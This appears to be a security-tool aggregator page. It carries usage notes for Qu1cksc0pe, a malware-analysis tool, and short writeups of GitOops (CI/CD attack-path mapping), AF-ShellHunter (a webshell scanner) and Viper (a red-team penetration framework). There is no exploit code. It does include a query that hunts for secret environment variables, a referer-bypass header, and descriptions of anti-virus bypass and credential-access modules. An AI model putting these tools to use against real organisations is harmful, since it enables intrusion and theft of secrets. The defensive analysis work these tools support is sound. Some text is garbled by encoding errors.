Usage: python3 qu1cksc0pe.py --file suspicious_file --hashscan


Folder scan

Supported Arguments:

  • --hashscan
  • --packer

Usage: python3 qu1cksc0pe.py --folder FOLDER --hashscan
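The --packer argument from the list above is invoked the same way:

Usage: python3 qu1cksc0pe.py --folder FOLDER --packer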




VirusTotal

Report Contents:

  • Threat Categories
  • Detections
  • CrowdSourced IDS Reports

Usage for --vtFile: python3 qu1cksc0pe.py --file suspicious_file --vtFile




Document scan

Usage: python3 qu1cksc0pe.py --file suspicious_document --docs



Programming language detection

Usage: python3 qu1cksc0pe.py --file suspicious_executable --lang




Interactive shell

Usage: python3 qu1cksc0pe.py --console



Domain

Usage: python3 qu1cksc0pe.py --file suspicious_file --domain


Information about categories

Registry

This category contains functions and strings about:

  • Creating or destroying registry keys.
  • Changing registry keys and logs.

File

This category contains functions and strings about:

  • Creating/modifying/infecting/deleting files.
  • Getting information about file contents and filesystems.

Networking/Web

This category contains functions and strings about:

  • Communicating with malicious hosts.
  • Downloading malicious files.
  • Sending information about the infected machine and its user.

Process

This category contains functions and strings about:

  • Creating/infecting/terminating processes.
  • Manipulating processes.

Dll/Resource Handling

This category contains functions and strings about:

  • Handling DLL files and other malware resource files.
  • Infecting and manipulating DLL files.

Evasion/Bypassing

This category contains functions and strings about:

  • Manipulating Windows security policies and bypassing restrictions.
  • Detecting debuggers and doing evasive tricks.

System/Persistence

This category contains functions and strings about:

  • Executing system commands.
  • Manipulating system files and system options to get persistence in target systems.

COMObject

This category contains functions and strings about:

  • Microsoft's Component Object Model system.

Cryptography

This category contains functions and strings about:

  • Encrypting and decrypting files.
  • Creating and destroying hashes.

Information Gathering

This category contains functions and strings about:

  • Gathering information from target hosts, such as process states, network devices, etc.

Keyboard/Keylogging

This category contains functions and strings about:

  • Tracking the infected machine's keyboard.
  • Gathering information about the target's keyboard.
  • Managing input methods, etc.

Memory Management

This category contains functions and strings about:

  • Manipulating and using the target machine's memory.


GitOops - All Paths Lead To Clouds

9 October 2021 at 20:30
By: Zion3R


GitOops is a tool to help attackers and defenders identify lateral movement and privilege escalation paths in GitHub organizations by abusing CI/CD pipelines and GitHub access controls.


It works by mapping relationships between a GitHub organization and its CI/CD jobs and environment variables. It'll use any Bolt-compatible graph database as its backend, so you can query your attack paths with openCypher:

MATCH p=(:User{login:"alice"})-[*..5]->(v:EnvironmentVariable)
WHERE v.name =~ ".*SECRET.*"
RETURN p


GitOops takes inspiration from tools like Bloodhound and Cartography.

Check out the docs and more example queries.
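As a further illustration, the same pattern can hunt for paths to repositories rather than environment variables. Note that the Repository label and name property below are assumptions for this sketch; consult the docs for the actual schema:

MATCH p=(:User{login:"alice"})-[*..5]->(r:Repository)
WHERE r.name =~ ".*infra.*"
RETURN p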



AF-ShellHunter - Auto Shell Lookup

9 October 2021 at 11:30
By: Zion3R


AF-ShellHunter: Auto shell lookup

AF-ShellHunter is a script by AF Team designed to automate the search for webshells.


How to

pip3 install -r requirements.txt
python3 shellhunter.py --help


Basic Usage

You can run shellhunter in two modes

  • --url -u When scanning a single url
  • --file -f Scanning multiple URLs at once

Example: searching for webshells through the Burp Suite proxy, hiding responses that contain the string "404" and keeping those with a size between 100 and 1000 chars

โ”Œโ”€โ”€(blueudpใ‰ฟxxxxxxxx)-[~/AF-ShellHunter]
โ””โ”€$ python3 shellhunter.py -u https://xxxxxxxxxx -hs "404" -p burp --greater-than 100 --smaller-than 1000
Running AF-Team ShellHunt 1.1.0

URL: https://xxxxxxxxxx
Showing only: 200, 302
Threads: 20
Not showing coincidence with: 404
Proxy: burp
Greater than: 100
Smaller than: 1000
Found https://xxxxxxxxxx/system.php len: 881


File configuration for multiple sites

phishing_list

# How to?
# set country block with [country], please read user_files/config.txt

# 'show-response-code "option1" "option2"' -> show responses with those status codes, as -sc
# 'show-string' -> show match with that string, as -ss
# 'show-regex' -> show match with regex, as -sr

# use 'not' for not showing X in above options, as -h[option]

# 'greater-than' -> Show response greater than X, as -gt ( --greater-than )
# 'smaller-than' -> Show responses smaller than X, as -st ( --smaller-than )


# Example searching webshell with BurpSuite proxy. 302, 200 status code, not showing results w/ 'pรกgina en mantenimiento' with size between 100 and 1000 chars

[burp]
https://banco.phishing->show-response-code "302" "200", not show-string "pรกgina en mantenimiento", greater-than 100, smaller-than 1000

[noproxy]
banco.es-> # ShellHunt will add 'http://

Setting your proxies and custom headers

config.txt

[HEADERS]  # REQUESTS CUSTOM HEADERS, ADD 'OPTION: VALUE'
User-Agent? Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36
Referer? bit.ly/THIS_is_PHISHING # Bypass referer protection

[PROXIES]
burp? https://127.0.0.1:8080,http://127.0.0.1:8080

Other features
  1. Filter by regex
  2. Filter by string
  3. Filter by HTTP Status code
  4. Filter by length
  5. Custom Headers
  6. Custom proxy or proxy block for URL file
  7. Multithreading ( custom workers number )
                                                              .-"; ! ;"-.
----. .'! : | : !`.
" _} /\ ! : ! : ! /\
"@ > /\ | ! :|: ! | /\
|\ 7 ( \ \ ; :!: ; / / )
/ `-- ( `. \ | !:|:! | / .' )
,-------,**** (`. \ \ \!:|:!/ / / .')
~ >o< \---------o{___}- => \ `.`.\ |!|! |/,'.' /
/ | \ / ________/8' `._`.\\\!!!// .'_.'
| | / " `.`.\\|//.'.'
| / | |`._`n'_.'|
"----^----"


Viper - Intranet Pentesting Tool With Webui

8 October 2021 at 20:30
By: Zion3R


  • Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of intranet penetration
  • Viper integrates basic functions such as anti-virus bypass, intranet tunneling, file management, command line, and so on
  • Viper has integrated 80+ modules, covering Resource Development / Initial Access / Execution / Persistence / Privilege Escalation / Defense Evasion / Credential Access / Discovery / Lateral Movement / Collection and other categories
  • Viper's goal is to help red team engineers improve attack efficiency, simplify operation and reduce the technical threshold
  • Viper supports running native msfconsole in the browser, with multi-person collaboration






Website

Installation manual

FAQ

Issues

Modules

System architecture diagram



Development Manual

Source Code
  • viperjs (Frontend)

https://github.com/FunnyWolf/viperjs

  • viperpython (Backend)

https://github.com/FunnyWolf/viperpython

  • vipermsf (MSFRPC)

https://github.com/FunnyWolf/vipermsf


Acknowledgement

Edward_Snowdeng, exp, Fnzer0, qingyun00, 脸谱, NoobFTW, Somd5-小宇, timwhitez, ViCrack, xiaobei97, yumusb



โŒ